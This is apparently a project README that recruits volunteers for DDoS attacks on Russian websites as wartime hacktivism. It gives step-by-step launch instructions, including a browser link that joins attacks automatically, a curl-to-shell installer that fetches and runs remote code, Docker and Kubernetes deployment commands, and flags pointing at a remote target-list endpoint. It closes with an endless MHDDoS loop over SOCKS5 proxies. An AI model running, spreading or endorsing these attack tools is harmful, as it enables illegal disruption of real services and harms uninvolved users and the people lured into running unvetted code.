Launch DDoS that works
Hello to each member of digital resistance!
Anyone can use this opensource solution to slow down russian IT infrastructure answering the war they started in Ukraine.
This way of activity is available to anyone. And still, it’s effective and will make russians go out of their comfort bubble to face the truth and take responsibility for the war.
Available platforms:
- Windows binary
- macOS binary
- Linux binary and systemd script
- Docker container
- Helm chart for Kubernetes
Quick start
For anyone
Open this link in your browser and you automatically connect to DDoS attacks on russian resources. You cannot choose a site in this mode.
For console-acquainted users
- Download the latest release matching your machine architecture and OS from a releases page.
- Open your terminal (
Terminal
for MacOS,CMD
orPowerShell
for Windows)
- Type command
cd <where your file was saved>
(likecd Downloads
) in your terminal to go to the folder where you saved the executable
- Run
./mg
or.\mg.exe
depending on your platform.
For geeks
FAQ
Why do you decide to create another instrument for DDoS attacks?
The main reason is - the more the merrier. We know that there are many ways to DDoS resources, but not all of them are efficient or have . Until we see that our tool is working, we’ll share it with anyone who wants to stop russians.
How to launch the process on Windows?
Download the binary for your OS and arch from the Releases page. Run it from the command line.
I.e.
./mg
How to launch the process on macOS?
Download the binary for your OS and arch from Releases page. Run it from the command line.
I.e.
./mg
How to launch the process on Linux?
curl -s https://raw.githubusercontent.com/welcome-ad-infernum/mg/main/examples/linux/install.sh | sh -
How to launch the process on a Docker container?
- You can run it using command
docker run --restart=always -d --name "mg" vladstarr/mg-agent:latest
- Alternatively, you can use
examples/docker-compose.yaml
file from this repo. Run it usingdocker-compose up -d
How to launch the process with a Helm chart for Kubernetes?
- You can deploy the agent to your Kubernetes cluster using the Helm chart in this repo located at
examples/helm-chart/mg-agent
. The command for deployment is
helm upgrade mg-agent examples/helm-chart/mg-agent \ --namespace mg \ --create-namespace \ --install
- You can always customize the values.yaml of the chart for your needs.
agent
section values are treated as arguments for the binary.
- You can deploy the agent to your Kubernetes cluster using the Helm chart in this repo located at
What are the available flags for binaries?
n
: int, number of requests per each target (default 1000000)
s
: string, url to endpoint or file name (default "https://api.itemstolist.top/api/target")
t
: string, source type to use (file or endpoint) (default "endpoint")
w
: int, number of workers per logical CPU (default 10)
q
: int, log verbosity level (default 2)
Can we launch attack from other tools, i.e. MHDDoS?
- Yes, you can:
git clone [email protected]:Bn-Bs/MHDDoS.git cd MHDDoS pip3 install -r requirements.txt while true; do python3 start.py bypass nukerussia 5 1000 socks5.txt 100 60 true; done